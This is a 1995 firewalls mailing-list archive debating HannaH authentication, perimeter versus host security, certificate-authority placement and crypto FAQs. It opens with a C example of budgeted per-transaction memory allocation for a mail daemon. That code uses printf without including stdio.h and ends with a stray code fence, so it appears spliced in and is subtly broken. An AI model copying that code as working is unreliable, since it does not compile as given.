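#include <stdlib.h>
#include <string.h>

/* Style 1: the xmalloc() wrapper from the quoted message. Never returns
 * NULL; on failure the whole process dies. */
void *xmalloc(size_t n)
{
    void *p = malloc(n);
    if (p == NULL) {
        fprintf(stderr, "xmalloc: out of memory (%lu bytes)\n", (unsigned long)n);
        exit(EXIT_FAILURE);
    }
    return p;
}

/* Style 2: a per-transaction arena with a hard byte budget (constructed
 * for this example). A failure marks only this transaction as failed. */
#define TXN_MAX_BLOCKS 64

struct txn {
    size_t budget;                 /* bytes this transaction may hold */
    size_t used;                   /* bytes charged so far */
    void  *blocks[TXN_MAX_BLOCKS]; /* everything to free at txn_end() */
    int    nblocks;
    int    failed;                 /* sticky: set on the first failure */
};

void txn_init(struct txn *t, size_t budget)
{
    memset(t, 0, sizeof *t);
    t->budget = budget;
}

/* Returns NULL instead of exiting when the budget, the block table or the
 * real allocator is exhausted. The caller then aborts the transaction. */
void *txn_alloc(struct txn *t, size_t n)
{
    if (t->failed || t->nblocks >= TXN_MAX_BLOCKS || n > t->budget - t->used) {
        t->failed = 1;
        return NULL;
    }
    void *p = malloc(n);
    if (p == NULL) {               /* genuine malloc() failure */
        t->failed = 1;
        return NULL;
    }
    t->blocks[t->nblocks++] = p;
    t->used += n;
    return p;
}

/* Free everything the transaction took, succeeded or not, so the daemon
 * returns to its previous footprint and can serve the next client. */
void txn_end(struct txn *t)
{
    for (int i = 0; i < t->nblocks; i++)
        free(t->blocks[i]);
    t->nblocks = 0;
    t->used = 0;
}

/* Simulated mail transaction: copy each recipient into the arena.
 * Returns the number accepted, or -1 if the transaction was rejected for
 * exceeding its budget; the process itself keeps running either way. */
int handle_transaction(const char *const *rcpts, int nrcpts, size_t budget)
{
    struct txn t;
    int accepted = 0;
    txn_init(&t, budget);
    for (int i = 0; i < nrcpts; i++) {
        size_t len = strlen(rcpts[i]) + 1;
        char *copy = txn_alloc(&t, len);
        if (copy == NULL) {
            accepted = -1;
            break;
        }
        memcpy(copy, rcpts[i], len);
        accepted++;
    }
    txn_end(&t);
    return accepted;
}

/* Constructed sample inputs: an ordinary recipient list and the kind of
 * enormous list the quoted message worries about. Budget is 4096 bytes. */
int demo_small(void)
{
    const char *small[] = { "alice@example.test", "bob@example.test" };
    return handle_transaction(small, 2, 4096);
}

int demo_flood(void)
{
    static const char *flood[200];
    for (int i = 0; i < 200; i++)
        flood[i] = "someone.with.a.long.address@example.test";
    return handle_transaction(flood, 200, 4096);
}

int main(void)
{
    printf("small list: %d accepted\n", demo_small());
    printf("flood list: %d accepted (daemon still running)\n", demo_flood());
    return 0;
}
```

The flood case trips the budget (and the block-table limit) long before the real allocator fails, which is the point: the daemon decides what one client may cost before the system is in trouble, rather than discovering exhaustion only when malloc() finally returns NULL.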
--
Ted Stockwell, stockwel@sctc.com, Sidewinder

From firewalls-owner Fri Sep 1 09:32:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02333 for firewalls-outgoing; Fri, 1 Sep 1995 09:17:27 -0700
Received: from ncar.UCAR.EDU (ncar.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA02324; Fri, 1 Sep 1995 09:17:23 -0700
Message-Id: <199509011615.KAA23389@ncar.ucar.EDU>
Received: by ncar.ucar.EDU (NCAR-local/ NCAR Central Post Office 03/11/93) id KAA23389; Fri, 1 Sep 1995 10:15:41 -0600
Subject: Re: HannaH from SecureWare Inc.
To: cooleycd@jmu.edu (Charles Cooley)
Date: Fri, 1 Sep 95 10:15:39 MDT
Cc: alan@mid.net, isdmill@gatekeeper.ddp.state.me.us, gary@habanero.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com
In-Reply-To: ; from "Charles Cooley" at Sep 1, 95 11:22 am
From: woods@ncar.ucar.edu (Greg Woods)
X-Mailer: ELM [version 2.3 PL11]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> The impression that I am getting from the
> two responses to Gary's message, is that firewall and other network security
> are significantly more important than individual host security mechanisms.

I think there are two things being said here. First of all, firewalls provide more bang for the buck in terms of security. You can provide much more security with much less staff effort by building a firewall than you can by attempting to secure each individual host. The second point is that complete security on an individual host basis is nearly impossible to achieve if you have a decent-sized LAN. (In our own case, we have about 20 different identifiable groups that want to interoperate relatively freely with each other (and well over 1000 hosts), but have differing amounts of sysadmin time and skill available.
To expect every host on our LAN to be adequately secured under these conditions is, at best, unrealistic). The second of these points implies that a firewall is really mandatory unless we're willing to impose security restrictions even upon connections between hosts on our own LAN.

I do NOT think that the presence of a firewall implies that individual host security can therefore be totally neglected. But by concentrating the security effort on a perimeter defense, then internally securing hosts based on the importance of security to that particular host and staff time available, one can do the best possible job in a situation where infinite resources to devote to security are not available.

> A significant portion of the
> security breaches are not from "foreigners" but from discontented and
> anti-social "natives" in the electronic world.

That hasn't been our experience here, although I grant that in the commercial environment this tends to be true. But dealing with internal security threats is a completely different and much more difficult job.

--Greg

From firewalls-owner Fri Sep 1 10:00:16 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03434 for firewalls-outgoing; Fri, 1 Sep 1995 09:46:50 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03420 for ; Fri, 1 Sep 1995 09:46:37 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA13852; Fri, 1 Sep 95 12:18:00 -0400
Date: Fri, 1 Sep 95 12:17:59 -0400
Message-Id: <9509011618.AA13852@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Security Paradigms (was HannaH)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>One of HannaH's advantages is that it provides a mechanism to provide
>security based on the identity of a person rather than a host. The old
>Internet concept of host is out of date. Hosts were multi-user systems
>owned and MANAGED by organizations and individual people were
>authenticated by those hosts. With the proliferation of PC class
>systems, many systems connected to networks are single user systems.
>The old assumptions about security (like the "secure" ports below 512/1024)
>can be very dangerous.

Charles hits on a very important point: in the daze of old when sysadmins were men and smelled like....sorry rong parable.

In the day of the mainframe, it was in a glass room and had things like "system consoles". Users were often numbered in the thousands but limited in what they could do. In the beginning this was not a matter of security, rather a matter of keeping user "B" from crashing the system when user "A" was 72 hours into a 73 hour Hydracode run. The operators/sysadmins were highly trained individuals who may have gone to week-long schools on things like "device drivers", "networking", "basic system management", "advanced system management" partly paid by the company but mostly supplied as part of the multi-million dollar system lease.

Today we have about the same number of users but *each one* has full "system privilege" over a U$3,000 machine that *might* come with a tutorial written for illiterates. These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD TO TRAIN THEM. We do not have the resources, or the time, or the "lost productivity" such training would entail. Besides if we did they would immediately command 40% more pay.

As a result, we have had to move security off the host/node to "somewhere else". In most cases this is at the firewall/network/subnet level where it again becomes manageable with available resources.

I do not see HannaH as a "user level" mechanism. I do see it as a potentially valuable system for a trusted host on a Bastion Network designed to make sensitive information available to customers via the Internet. This is not a blue sky problem, it is a real one I face daily.

But the point is that we do not have the *luxury* of NOT having a "soft chewy center", it is the reality of the 90's that unless you are a well funded government agency, you can't afford a hardened compartmented center where every node can be trusted. We do what we can with what we have and to me, HannaH sounds like it could be a valuable tool.

Warmly,
Padgett

From firewalls-owner Fri Sep 1 10:32:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05660 for firewalls-outgoing; Fri, 1 Sep 1995 10:28:26 -0700
Received: from ix6.ix.netcom.com (ix6.ix.netcom.com [199.182.120.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA05632 for ; Fri, 1 Sep 1995 10:28:21 -0700
Received: from by ix6.ix.netcom.com (8.6.12/SMI-4.1/Netcom) id KAA23363; Fri, 1 Sep 1995 10:24:13 -0700
Date: Fri, 1 Sep 1995 10:24:13 -0700
Message-Id: <199509011724.KAA23363@ix6.ix.netcom.com>
From: clp2@ix.netcom.com (Carol pollard )
Subject: Firewall Requirements Document
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

---- Begin Forwarded Message
From: clp2@ix.netcom.com (Carol pollard )
Subject: Firewall Requirements Document
To: firewall@greatcircle.com

After monitoring this maillist, I get the impression that the majority of firewall implementations are managed by the network technician experts. Being a security risk analyst, I certainly see why. For whatever reasons, it was decided that our firewall design and implementation project would be led by our security staff...me!!
Obviously, I've had to learn as much about networking as possible and now have a greater appreciation for their responsibility and knowledge!

I've been in the process of documenting our requirements for firewall, but most of them are from a security perspective. Is anyone willing to share with me their process for developing a requirements document that covers both security-related and networking-related issues? Should requirement documents for firewalls be detailed or at a high level? Are we actually taking the time to document requirements?? We don't do anything without a requirements doc, but usually the person writing the doc has been deemed the "expert". We have our policy, but it's at a very high level.

Any help or examples of firewall requirements would be greatly appreciated.

Carol
---- End Forwarded Message

From firewalls-owner Fri Sep 1 10:38:58 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04727 for firewalls-outgoing; Fri, 1 Sep 1995 10:06:03 -0700
Received: from relay1gw.alcatel.fr (relay1gw.alcatel.fr [193.104.30.53]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04719 for ; Fri, 1 Sep 1995 10:05:58 -0700
Received: from istans.ansf.alcatel.fr by relay1gw.alcatel.fr with SMTP (1.37.109.8/16.2) id AA14898; Fri, 1 Sep 1995 19:03:54 +0200
Received: from ahqp14.ansf.alcatel.fr ([155.132.120.211]) by istans.ansf.alcatel.fr (4.1/SMI-4.1) id AA03029; Fri, 1 Sep 95 19:06:29 +0200
Message-Id: <9509011706.AA03029@istans.ansf.alcatel.fr>
Comments: Authenticated sender is
From: "Kare Presttun"
Organization: Alcanet International
To: Firewalls@GreatCircle.COM
Date: Fri, 1 Sep 1995 19:09:21 +0200
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: comparison study between DES and RSA
Reply-To: Kare.Presttun@ansf.alcatel.fr
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.01)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: Lee Hooi Teck
> Date: Fri, 1 Sep 1995 11:18:21 +0800
> Subject: comparison study between DES and RSA
>
> Hi,
>
> I am looking into network security currently and found that most of the
> products use either DES or RSA for authentication and encryption.
>
> Is there any info or document that has mentioned the pros and cons of
> these two types of cryptosystems? How are these technologies being used in
> digital signature?
>

Go to www.rsa.com and pick up their Crypto FAQ.

Go to www.eff.org and pick up another Crypto FAQ, and political stuff.

Go to csrc.ncsl.nist.gov and find out what is going on in the key escrow area. There you can also pick up their official statement regarding export (csl bulletin 02-95). There are a lot of other interesting documents there too, like the security FIPS. Good reading.

> Hope that there is info for the export issue on these two systems as well.
>
> Thanks in advance for the help.
>
> teck

Kare
----------------------------------------------------------
| Kare Presttun                   Alcanet International  |
| Tel: +33 1 4058 5614            33, rue Emeriau        |
| Fax: +33 1 4058 5945            F-75015 Paris          |
| Kare.Presttun@ansf.alcatel.fr   FRANCE                 |

From firewalls-owner Fri Sep 1 11:00:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06890 for firewalls-outgoing; Fri, 1 Sep 1995 10:53:14 -0700
Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA06880 for ; Fri, 1 Sep 1995 10:53:10 -0700
From: mulligan@future.incog.com
Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id KAA23579; Fri, 1 Sep 1995 10:51:12 -0700
Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08138; Fri, 1 Sep 1995 11:51:15 -0600
Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07790; Fri, 1 Sep 1995 11:51:15 -0600
Message-Id: <9509011751.AA07790@future.incog.com>
To: gary flynn
Cc: shields@yage.tembel.org, firewalls-digest@GreatCircle.COM
Subject: Re: HannaH from SecureWare Inc.
Reply-To: mulligan@incog.com
In-Reply-To: Your message of "Fri, 01 Sep 1995 10:00:21 EDT." <199509011409.HAA26521@miles.greatcircle.com>
Date: Fri, 01 Sep 1995 11:51:14 -0600
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

As with most things in the security arena there is no ONE right solution for everyone. A firewall may be a perfectly fine solution for some organizations and some type of end system security may work for others. If you are a site with hundreds or thousands of end systems, trying to maintain a single centralized control over all these machines would probably be impossible and would definitely be a nightmare.

Gary Flynn wrote:
> 1. Kerberos requires modification of each application that
> its to be used with. Hence limited support. Hannah allows
> the use of any application using standard winsock or
> socket library calls on supported platforms.

It is very true that Kerberos requires that each end application be kerberized, as SSL and socks require each application to be modified.

One of Hannah's failings is that it only supports TCP applications. They say it will support UDP in a future release, but that is easy to do, except that their key negotiation will be a terrible overhead to pay for small udp packet exchanges. Also what it won't support are things like IP multicast, as will none of the above.

> 3. Hannah's "certificate diskette" for each user solves
> some problems that Kerberos has on desktop machines.

This only solves the problem for PC's or single user desktop machines. Hannah still is only machine based authentication no matter how you wrap it. This doesn't solve the multiuser desktop authentication problem. (There isn't a diskette slot on a VT100.)

The "certificate diskette" is yet another potential problem.
Since the private key is decrypted off the disk and stored in the end system it is available to be read by anything running on the system (especially on PCs), and when the diskette is removed does the private key get removed or does the system maintain its identity/Distinguished Name? It can't check for the presence of the diskette on every packet or it would be too slow to be usable. In addition the private key (though encrypted) on the certificate diskette is copyable.

geoff

From firewalls-owner Fri Sep 1 11:35:56 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08408 for firewalls-outgoing; Fri, 1 Sep 1995 11:18:20 -0700
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08401 for ; Fri, 1 Sep 1995 11:18:13 -0700
Message-Id: <199509011818.LAA08401@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA008448927; Fri, 1 Sep 1995 14:08:47 -0400
Date: Fri, 1 Sep 1995 14:08:47 -0400
From: gary flynn
To: mulligan@incog.com
Subject: Re: HannaH from SecureWare Inc.
Cc: firewalls-digest@GreatCircle.COM, shields@yage.tembel.org
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From mulligan@future.incog.com Fri Sep 1 13:43 EDT 1995
>
> As with most things in the security arena there is no ONE right solution
> for everyone. A firewall may be a perfectly fine solution for some
> organizations and some type of end system security may work for others.
> If you are a site with hundreds or thousands of end systems, trying to
> maintain a single centralized control over all these machines would
> probably be impossible and would definitely be a nightmare.
>
> One of Hannah's failings is that it only supports TCP applications. They
> say it will support UDP in a future release, but that is easy to do,
> except that their key negotiation will be a terrible overhead to pay
> for small udp packet exchanges. Also what it won't support are things
> like IP multicast, as will none of the above.
>

True, it has some limitations. Some will be solved, some may not. But for our users of mainline applications, it seems to cover the bases pretty well.

> > 3. Hannah's "certificate diskette" for each user solves
> > some problems that Kerberos has on desktop machines.
>
> This only solves the problem for PC's or single user desktop machines.
> Hannah still is only machine based authentication no matter how you wrap
> it. This doesn't solve the multiuser desktop authentication problem.
> (There isn't a diskette slot on a VT100.)
>

The bulk of our machines are PCs. I probably should have made that clear.

> The "certificate diskette" is yet another potential problem. Since the
> private key is decrypted off the disk and stored in the end system it is
> available to be read by anything running on system (especially on PCs)
> and when the diskette is removed does the private key get removed or
> does the system maintain its identity/Distinguished Name. It can't check
> for the presence of the diskette on every packet or it would be too slow
> to be usable. In addition the private key (though encrypted) on the
> certificate diskette is copyable.
>

I'd put this in the class of "please remember to logoff the system when you are done and before leaving your terminal/PC". The user needs to "unsecure" the desktop before leaving. This may imply turning it off or Hannah may have some procedure to "unauthenticate". The diskette is a threat but physical security addresses that.

Thank you for your comments. These exchanges have been very useful.
gary

From firewalls-owner Fri Sep 1 11:44:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07945 for firewalls-outgoing; Fri, 1 Sep 1995 11:09:43 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA07922 for ; Fri, 1 Sep 1995 11:09:37 -0700
From: gary@habanero.jmu.edu
Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA14211; Fri, 1 Sep 95 14:08:11 -0400
Date: Fri, 1 Sep 95 14:08:10 -0400
Message-Id: <9509011808.AA14211@uvs1.orl.mmc.com>
To: firewalls-owner@greatcircle.com, firewalls%greatcircle.com@uvs1.dnet.mmc.com
Subject: Re: Security Paradigms (was HannaH)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD
> TO TRAIN THEM. We do not have the resources, or the time, or the "lost
> productivity" such training would entail. Besides if we did they would
> immediately command 40% more pay.
>
> As a result, we have had to move security off the host/node to "somewhere
> else". In most cases this is at the firewall/network/subnet level where it
> again becomes manageable with available resources.
>

What about the case where most of the users are non-technical and don't mess with things like what winsock compliant stack they're running? In this case, these things are provided centrally. If they don't mess with them, then they'll work. A malicious user messing with them won't be able to communicate with the hosts that have the same protection. A user that inadvertently overwrites the "secure stack" with an "unsecure stack" also won't be able to communicate, which will result in a helpdesk call.

We're not trying to prevent communications with non-secure hosts. We're trying to secure communications between authorized users and critical hosts.
Hence, again, if the vast majority of people use the centrally provided software on the desktop, the vast majority will have secure communications.

The desktops are mostly PCs and there are a limited number of critical hosts. The manpower to administer the critical hosts is available. Administration of the PCs, in the Hannah case, simply means providing the winsock replacement or shim (I think). This can be handled through the standard desktop software configuration mechanism which may be file server installation, configuration management software, helpdesk personnel, etc.

gary

> I do not see HannaH as a "user level" mechanism. I do see it as a potentially
> valuable system for a trusted host on a Bastion Network designed to make
> sensitive information available to customers via the Internet. This is not
> a blue sky problem, it is a real one I face daily.
>
> But the point is that we do not have the *luxury* of NOT having a "soft
> chewy center", it is the reality of the 90's that unless you are a well
> funded government agency, you can't afford a hardened compartmented center
> where every node can be trusted. We do what we can with what we have and
> to me, HannaH sounds like it could be a valuable tool.
>
> Warmly,
> Padgett
>
>

From firewalls-owner Fri Sep 1 11:59:30 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07695 for firewalls-outgoing; Fri, 1 Sep 1995 11:05:56 -0700
Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA07668; Fri, 1 Sep 1995 11:05:48 -0700
From: mulligan@future.incog.com
Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24366; Fri, 1 Sep 1995 11:03:47 -0700
Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08294; Fri, 1 Sep 1995 12:03:48 -0600
Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07811; Fri, 1 Sep 1995 12:03:49 -0600
Message-Id: <9509011803.AA07811@future.incog.com>
To: Charles Cooley
Cc: Alan Hannan , David Miller , Gary Flynn , firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com
Subject: Re: HannaH from SecureWare Inc.
Reply-To: mulligan@incog.com
In-Reply-To: Your message of "Fri, 01 Sep 1995 11:22:21 EDT."
Date: Fri, 01 Sep 1995 12:03:49 -0600
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Charles Cooley wrote:
> While I agree that firewalls are an important defense to provide overall
> site security, it's not enough. The impression that I am getting from the
> two responses to Gary's message, is that firewall and other network security
> are significantly more important than individual host security mechanisms.

A combination of host and perimeter security is necessary. Just because people install firewalls doesn't mean that they get rid of passwords, but HannaH does seem to have some design flaws, as mentioned in previous messages.
> I believe that HannaH should be viewed as an alternative to Virtual LAN
> security schemes instead of firewalls and one of the complaints about
> Virtual LANs is maintainability.

As I mentioned earlier, one of the failings of HannaH is lack of support for IP multicasting which will become much more significant for LANs as more conferencing, phone, video software is distributed.

> One of HannaH's advantages is that it provides a mechanism to provide
> security based on the identity of a person rather than a host. The old
> Internet concept of host is out of date. Hosts were multi-user systems
> owned and MANAGED by organizations and individual people were
> authenticated by those hosts. With the proliferation of PC class
> systems, many systems connected to networks are single user systems.
> The old assumptions about security (like the "secure" ports below 512/1024)
> can be very dangerous.

If you assume that the systems connecting to the net are single user systems, there is no difference between host authentication and user authentication as long as I have to authenticate myself to the end system. HannaH also doesn't solve the multiuser desktop problem.
geoff

From firewalls-owner Fri Sep 1 12:02:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08981 for firewalls-outgoing; Fri, 1 Sep 1995 11:33:14 -0700
Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08972; Fri, 1 Sep 1995 11:33:10 -0700
From: mulligan@future.incog.com
Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24969; Fri, 1 Sep 1995 11:31:21 -0700
Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08415; Fri, 1 Sep 1995 12:31:23 -0600
Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07836; Fri, 1 Sep 1995 12:31:24 -0600
Message-Id: <9509011831.AA07836@future.incog.com>
To: gary flynn
Cc: isdmill@gatekeeper.ddp.state.me.us, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
Subject: Re: HannaH from SecureWare Inc.
Reply-To: mulligan@incog.com
In-Reply-To: Your message of "Fri, 01 Sep 1995 09:15:25 EDT." <199509011324.GAA25199@miles.greatcircle.com>
Date: Fri, 01 Sep 1995 12:31:23 -0600
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Gary wrote:
> Hannah is centrally administered although you have to install the
> product on all the platforms. So there is a central security
> administrator. Software distribution, installation, and configuration
> management mechanisms and policies need to exist for network/node
> management anyway, so the addition of one more product shouldn't
> negate the overall concept.

Oh and this points to another potential problem, they have combined the administrative system with the Certification Authority. This is very very bad.
The CA is the box that holds the very sensitive CA private key and having this box on the network just begs to have that key compromised - then anyone and everyone can sign certificates saying they are anyone. All security is lost, the war is lost, the count is 10 and you're out.

Key management/negotiation overhead is another very critical issue. Their document doesn't mention the protocol used to do this negotiation. What about support for different encryption mechanisms? In addition I haven't heard anything about the actual protocols. They certainly aren't open and publicly available. What about interoperability with other systems? They don't seem to be talking with any standards groups.

On the other hand there are systems being developed and available that provide much the same functionality (end to end encryption and authentication) without some of the drawbacks (key management overhead, lack of support for multiple encryption techniques, private/closed proprietary protocol, lack of multi-protocol support) such as SKIP and others being worked on in the IPSEC working group.
geoff From firewalls-owner Fri Sep 1 12:27:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07688 for firewalls-outgoing; Fri, 1 Sep 1995 11:05:54 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA07666; Fri, 1 Sep 1995 11:05:47 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24360; Fri, 1 Sep 1995 11:03:44 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08293; Fri, 1 Sep 1995 12:03:43 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07805; Fri, 1 Sep 1995 12:03:43 -0600 Message-Id: <9509011803.AA07805@future.incog.com> To: Charles Cooley Cc: Alan Hannan , David Miller , Gary Flynn , firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, adm_lcorea@VAX1.ACS.JMU.EDU, foxtrot@sware.com, oit_cathy@VAX1.ACS.JMU.EDU, oit_charles@VAX1.ACS.JMU.EDU, oit_dbh@VAX1.ACS.JMU.EDU, shan.bell@sware.com Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 11:22:21 EDT." Date: Fri, 01 Sep 1995 12:03:43 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Cooley wrote: > While I agree that firewalls are an important defense to provide overall > site security, it's not enough. The impression that I am getting from the > two responses to Gary's message, is that firewall and other network security > are significantly more important than individual host security mechanisms. A combination of host and perimeter security is necessary. Just because people install firewalls doesn't mean that they get rid of passwords, but HannaH does seems to have some design flaws and mentioned in previous messages. 
> I believe that HannaH should be viewed as an alternative to Virtual LAN
> security schemes instead of firewalls and one of the complaints about
> Virtual LANs is maintainability.

As I mentioned earlier, one of the failings of HannaH is lack of support for IP multicasting, which will become much more significant for LANs as more conferencing, phone and video software is distributed.

> One of HannaH's advantages is that it provides a mechanism to provide
> security based on the identity of a person rather than a host. The old
> Internet concept of host is out of date. Hosts were multi-user systems
> owned and MANAGED by organizations and individual people were
> authenticated by those hosts. With the proliferation of PC class
> systems, many systems connected to networks are single user systems.
> The old assumptions about security (like the "secure" ports below 512/1024)
> can be very dangerous.

If you assume that the systems connecting to the net are single user systems, there is no difference between host authentication and user authentication as long as I have to authenticate myself to the end system. HannaH also doesn't solve the multiuser desktop problem.
geoff

From firewalls-owner Fri Sep 1 12:30:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08970 for firewalls-outgoing; Fri, 1 Sep 1995 11:33:09 -0700
Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08963; Fri, 1 Sep 1995 11:33:05 -0700
From: mulligan@future.incog.com
Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA24966; Fri, 1 Sep 1995 11:31:15 -0700
Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08412; Fri, 1 Sep 1995 12:31:21 -0600
Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07829; Fri, 1 Sep 1995 12:31:21 -0600
Message-Id: <9509011831.AA07829@future.incog.com>
To: gary flynn
Cc: isdmill@gatekeeper.ddp.state.me.us, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
Subject: Re: HannaH from SecureWare Inc.
Reply-To: mulligan@incog.com
In-Reply-To: Your message of "Fri, 01 Sep 1995 09:15:25 EDT." <199509011324.GAA25199@miles.greatcircle.com>
Date: Fri, 01 Sep 1995 12:31:21 -0600
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Gary wrote:
> Hannah is centrally administered although you have to install the
> product on all the platforms. So there is a central security
> administrator. Software distribution, installation, and configuration
> management mechanisms and policies need to exist for network/node
> management anyway, so the addition of one more product shouldn't
> negate the overall concept.

Oh, and this points to another potential problem: they have combined the administrative system with the Certification Authority. This is very, very bad.
The CA is the box that holds the very sensitive CA private key, and having this box on the network just begs to have that key compromised; then anyone and everyone can sign certificates saying they are anyone. All security is lost, the war is lost, the count is 10 and you're out.

Key management/negotiation overhead is another very critical issue. Their document doesn't mention the protocol used to do this negotiation. What about support for different encryption mechanisms?

In addition, I haven't heard anything about the actual protocols. They certainly aren't open and publicly available. What about interoperability with other systems? They don't seem to be talking with any standards groups.

On the other hand, there are systems being developed and available that provide much the same functionality (end to end encryption and authentication) without some of the drawbacks (key management overhead, lack of support for multiple encryption techniques, private/closed proprietary protocol, lack of multi-protocol support), such as SKIP and others being worked on in the IPSEC working group.
geoff

From firewalls-owner Fri Sep 1 12:30:35 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA10657 for firewalls-outgoing; Fri, 1 Sep 1995 11:59:49 -0700
Received: from bee.uspnet.usp.br (bee.uspnet.usp.br [143.107.253.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA10350; Fri, 1 Sep 1995 11:54:22 -0700
Received: from caju (caju.larc.usp.br [143.107.111.2]) by bee.uspnet.usp.br (8.6.10/SPARC10-CCE2.0) id PAA07418
Received: from jabuticaba.larc.usp.br by caju (5.0/SMI-SVR4) id AA19599; Fri, 1 Sep 1995 15:23:37 +0300
Received: (from mlrodrig@localhost) by jabuticaba.larc.usp.br (8.6.12/8.6.9) id OAA03757; Fri, 1 Sep 1995 14:36:29 -0300
Date: Fri, 1 Sep 1995 14:36:26 -0300 (EST)
From: Marcelo Lopes Rodrigues
To: Firewalls@GreatCircle.COM
Cc: firewalls-digest@GreatCircle.COM
